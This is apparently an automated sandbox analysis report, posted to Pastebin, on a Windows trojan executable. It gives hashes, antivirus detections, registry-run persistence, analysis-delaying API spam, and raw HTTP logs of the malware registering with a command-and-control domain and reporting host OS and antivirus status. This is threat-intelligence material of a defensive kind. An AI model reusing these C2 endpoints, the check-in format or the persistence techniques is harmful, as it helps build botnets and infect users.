Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: ""
- * MalScore: 10.0
- * File Name: "Exes_0638e86b98cd832964fd09630ff86743.exe"
- * File Size: 1089024
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "ccaaf5959f58f168cc07c98c54392cf0f0718ce53c17eb7606b691600854716a"
- * MD5: "0638e86b98cd832964fd09630ff86743"
- * SHA1: "29f06f9eb66cee7239f1c34624851d0e4176a765"
- * SHA512: "5b6754317ceafb032566543b4873786c5d7ed394155fe6939145d09335b308f2fb8a500dc6d99902f57431b84fb4ba123f8872a8bfe7de356aa838bae934a1f0"
- * CRC32: "1117FD49"
- * SSDEEP: "24576:sUaN/8LcBAUdhLb4/gdEwl474S99mjl0sxEqNG+E0YUh:w/BA636I5tKSEMGR0l"
- * Process Execution:
- "Exes_0638e86b98cd832964fd09630ff86743.exe"
- * Executed Commands:
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details":
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://shopstoregame.com/adminpanel/mycount.txt"
- "url": "http://shopstoregame.com/adminpanel/add_bot.php?os=Windows+7+Enterprise+N+(Build%3A+7601+-+Service+Pack%3A+1.0)+(x64)&bits=x64&av=Not+found"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "Exes_0638e86b98cd832964fd09630ff86743.exe (1212) called API RegDeleteKeyA 234837 times"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\VideoTek"
- "data": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_0638e86b98cd832964fd09630ff86743.exe"
- "Description": "File has been identified by 38 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Gen:Variant.Ser.Ursu.11744"
- "FireEye": "Generic.mg.0638e86b98cd8329"
- "ALYac": "Gen:Variant.Ser.Ursu.11744"
- "Malwarebytes": "Trojan.MalPack.GS"
- "CrowdStrike": "win/malicious_confidence_100% (D)"
- "BitDefender": "Gen:Variant.Ser.Ursu.11744"
- "Arcabit": "Trojan.Ser.Ursu.D2DE0"
- "ESET-NOD32": "a variant of Win32/Kryptik.GVCI"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "Kaspersky": "UDS:DangerousObject.Multi.Generic"
- "Alibaba": "Trojan:Win32/Kryptik.8b359cc0"
- "AegisLab": "Trojan.Win32.Ursu.4!c"
- "Ad-Aware": "Gen:Variant.Ser.Ursu.11744"
- "Sophos": "Troj/Kryptik-JW"
- "Qihoo-360": "HEUR/QVM10.1.FB97.Malware.Gen"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "Trojan-FRAU!0638E86B98CD"
- "Fortinet": "W32/GenKryptik.DORB!tr"
- "Trapmine": "malicious.high.ml.score"
- "Emsisoft": "Gen:Variant.Ser.Ursu.11744 (B)"
- "Ikarus": "PUA.Wajam"
- "Webroot": "W32.Trojan.Gen"
- "MAX": "malware (ai score=100)"
- "Endgame": "malicious (high confidence)"
- "Microsoft": "Trojan:Win32/Wacatac.B!ml"
- "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
- "AhnLab-V3": "Trojan/Win32.MalPe.R284228"
- "Acronis": "suspicious"
- "McAfee": "Trojan-FRAU!0638E86B98CD"
- "VBA32": "BScope.Trojan.AET.281105"
- "Cylance": "Unsafe"
- "Rising": "Malware.Obscure/Heur!1.9E03 (CLASSIC)"
- "GData": "Gen:Variant.Ser.Ursu.11744"
- "AVG": "FileRepMalware"
- "Cybereason": "malicious.eb66ce"
- "Panda": "Trj/GdSda.A"
- "MaxSecure": "Ransomeware.CRAB.gen"
- * Started Service:
- * Mutexes:
- * Modified Files:
- * Deleted Files:
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\VideoTek"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "shopstoregame.com",
- "answers":
- "data": "194.58.61.184",
- "type": "A"
- * Domains:
- "ip": "194.58.61.184",
- "domain": "shopstoregame.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://shopstoregame.com/adminpanel/mycount.txt",
- "user-agent": "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
- "method": "GET",
- "host": "shopstoregame.com",
- "version": "1.1",
- "path": "/adminpanel/mycount.txt",
- "data": "GET /adminpanel/mycount.txt HTTP/1.1\r\nHost: shopstoregame.com\r\nConnection: keep-alive\r\nUser-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\r\nAccept: */*\r\n\r\n",
- "port": 80
- "count": 29,
- "body": "",
- "uri": "http://shopstoregame.com/adminpanel/add_bot.php?os=Windows+7+Enterprise+N+(Build%3A+7601+-+Service+Pack%3A+1.0)+(x64)&bits=x64&av=Not+found",
- "user-agent": "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
- "method": "GET",
- "host": "shopstoregame.com",
- "version": "1.1",
- "path": "/adminpanel/add_bot.php?os=Windows+7+Enterprise+N+(Build%3A+7601+-+Service+Pack%3A+1.0)+(x64)&bits=x64&av=Not+found",
- "data": "GET /adminpanel/add_bot.php?os=Windows+7+Enterprise+N+(Build%3A+7601+-+Service+Pack%3A+1.0)+(x64)&bits=x64&av=Not+found HTTP/1.1\r\nHost: shopstoregame.com\r\nConnection: keep-alive\r\nUser-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\r\nAccept: */*\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment